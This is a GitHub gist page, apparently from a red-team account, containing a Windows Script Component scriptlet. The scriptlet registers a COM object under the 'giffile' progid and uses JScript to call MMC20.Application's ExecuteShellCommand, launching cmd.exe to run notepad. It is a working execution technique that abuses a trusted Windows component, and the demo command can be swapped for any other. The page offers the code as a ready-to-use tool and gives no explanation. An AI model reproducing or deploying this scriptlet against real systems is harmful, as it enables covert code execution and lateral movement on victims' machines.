-
-
Save RedTeams/58569651a04963a5c1d4fb41dafb610b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <package> | |
| <component id='giffile'> | |
| <registration | |
| description='Dummy' | |
| progid='giffile' | |
| version='1.00' | |
| remotable='True'> | |
| </registration> | |
| <script language='JScript'> | |
| <![CDATA[ | |
| new ActiveXObject('MMC20.Application','localhost').Document.ActiveView.ExecuteShellCommand('cmd.exe','','/c notepad.exe','7'); | |
| ]]> | |
| </script> | |
| </component> | |
| </package> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment